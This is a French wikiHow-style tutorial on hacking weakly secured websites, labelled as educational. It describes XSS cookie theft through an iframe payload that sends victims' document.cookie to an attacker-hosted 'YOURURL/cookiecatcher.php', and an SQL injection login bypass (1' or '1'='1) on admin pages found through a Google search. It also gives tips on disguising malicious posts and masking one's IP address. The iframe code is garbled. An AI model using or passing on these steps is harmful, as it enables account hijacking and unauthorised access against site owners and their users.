PDF download Télécharger l'article PDF download Télécharger l'article

Note : cet article est à vocation purement pédagogique, il permet soit d’aider les gens à apprendre le piratage, soit de leur expliquer comment opèrent les hackeurs pour être ensuite capable de mieux protéger leurs sites Web. Ce tutoriel vous donne les principales étapes à réaliser en vue d’accéder aux sites Web peu sécurisés.

Méthode 1
Méthode 1 sur 3:

Utiliser le script intersites (XSS)

PDF download Télécharger l'article
  1. Un forum est un bon exemple. Souvenez-vous que si le site est sécurisé, cela ne marchera pas.
  2. Vous devrez taper des codes spéciaux qui permettront de capturer des données sensibles lorsqu’on clique dans le « post ».
    • Vous devrez tester si le système est capable de filtrer votre code. Postez
      <script>window.alert(« test »)</script>
      Si une boite d’alerte apparait lorsque vous cliquez sur votre post, cela signifie que le site est vulnérable aux attaques.
  3. Le but de cette attaque est de capturer les cookies d’un utilisateur, ce qui vous permettra d’accéder à ses comptes de sites Web pour lesquels ses identifiants sont vulnérables. Vous aurez besoin d’un attrapeur de cookies qui permet de capturer les cookies visés et de les rediriger vers vous. Chargez l’attrapeur de cookies sur un site auquel vous avez accès et qui prend en charge le langage php.
  4. Entrez un code spécifique dans le message qui servira ensuite à capturer les cookies et à les envoyer sur votre site. Vous devrez entrer quelques mots de texte après le code afin de réduire la suspicion et d’éviter que votre message soit effacé.
    • Voici un exemple de code :
      <iframe frameborder= 0 height=0 width=0src=JavaScript... : void(document.location=
      "YOURURL/cookiecatcher.php?c= » document.cookie)></iframe>
  5. Après les avoir collectés, vous pouvez utiliser à quelques fins que ce soient les informations des cookies qui doivent être stockées dans votre site Web.
    Publicité
Méthode 2
Méthode 2 sur 3:

Exécuter une attaque par injection

PDF download Télécharger l'article
  1. Vous devrez trouver un site vulnérable en sachant si l’identifiant de l’administrateur du site est facilement accessible. Essayez de faire une recherche Google sur admin login.asp.
  2. Entrez admin en nom d’utilisateur et utilisez l’une des différentes combinaisons de mots de passe. Cela peut être n’importe quel nombre, un exemple assez commun est 1' ou '1'='1.
  3. Cette manœuvre nécessitera probablement plusieurs tentatives et vous ferez forcément quelques erreurs.
  4. Vous pourriez éventuellement être capable de trouver une combinaison qui vous donne un accès administrateur à un site Web, en supposant que celui-ci est vulnérable.
    Publicité
Méthode 3
Méthode 3 sur 3:

Se préparer à réussir

PDF download Télécharger l'article
  1. Si vous voulez réellement apprendre à pirater des sites Web, vous devrez comprendre comment fonctionnent les ordinateurs et les autres technologies. Apprenez à utiliser les langages de programmation tels que Python ou SQL de façon à savoir mieux contrôler un ordinateur et identifier les vulnérabilités des systèmes.
  2. Vous devrez également acquérir une bonne compréhension des langages HTML et JavaScript si vous souhaitez pirater des sites Web. L’apprentissage peut être long, mais il existe de nombreuses méthodes gratuites sur Internet qui vous faciliteront la tâche si vous avez la volonté de vous y mettre.
  3. Ce sont des hackeurs qui utilisent leurs capacités à des fins honnêtes, principalement pour mettre en évidence les failles de sécurité sur Internet et rendre la navigation plus sure pour n’importe qui. Si vous avez envie d’apprendre l’art du piratage pour ce genre de bonne raison ou si vous voulez simplement améliorer la protection de votre site Web, il peut être une bonne idée de contacter quelques whitehats pour vous aider.
  4. Si vous souhaitez apprendre à pirater ou si vous souhaitez simplement vous protéger, vous devrez faire beaucoup de recherches. Il y a tellement de façons différentes de trouver les failles d’un site Web que vous devrez apprendre en permanence.
  5. Parce que la liste des failles potentielles est en évolution permanente, vous devrez vous assurer que vous êtes à jour sur les techniques de piratage. Le fait d’être protégé d’un certain type de hack ne signifie pas que vous serez toujours en sécurité !
    Publicité

Conseils

  • Allez sur des forums de hackeurs en vue de découvrir quelques astuces utiles.
Publicité

Avertissements

  • Si vous comptez vous essayer au piratage dans le monde réel, masquez votre adresse IP en utilisant des logiciels adaptés disponibles en ligne.
  • Le fait de lire cet article ne fait pas de vous un hackeur. Vous DEVEZ travailler vos compétences et pratiquer, pratiquer et encore pratiquer.
  • Le piratage est illégal. Si vous vous faites attraper, vous êtes en faute.
Publicité

À propos de ce wikiHow

Cette page a été consultée 206 657 fois.

Cet article vous a-t-il été utile ?

Publicité